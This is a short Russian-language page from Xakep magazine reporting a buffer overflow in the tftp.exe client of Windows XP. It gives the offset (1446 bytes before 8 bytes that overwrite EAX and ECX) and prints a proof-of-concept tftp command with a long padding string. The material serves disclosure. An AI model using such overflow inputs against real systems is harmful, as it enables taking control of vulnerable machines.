Переполнение буфера в tftp в Windows XP

Рекомендуем почитать:

Xakep #299. Sysmon

Содержание выпуска
Подписка на «Хакер»-60%

Программа tftp.exe в Windows XP уязвима к
переполнению буфера, что позволяет хакеру
выполнить произвольные команды на системе.
Можно перезаписать регистры ЕАХ и ЕСХ,
послав 1446 байт бесполезных данных, а за ними
8 байт для регистров.

Эксплоит:

tftp -i 127.0.0.1 GET AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA<snip>CCCCBBBB

Переполнение буфера в tftp в Windows XP

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Agent Tesla. Учимся реверсить боевую малварь в Ghidra

HTB Surveillance. Эксплуатируем инъекцию команд через скрипт ZoneMinder

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Открыта регистрация на соревнования Киберколизей

Малварь атакует тех, кто ищет детское порно

Роскомнадзор сообщил, что блокирует около 150 популярных VPN-сервисов

Атаки Scaly Wolf провалились из за ошибки хакеров при подмене файлов

Критическая уязвимость в WordPress-плагинге Forminator угрожает 300 000 сайтов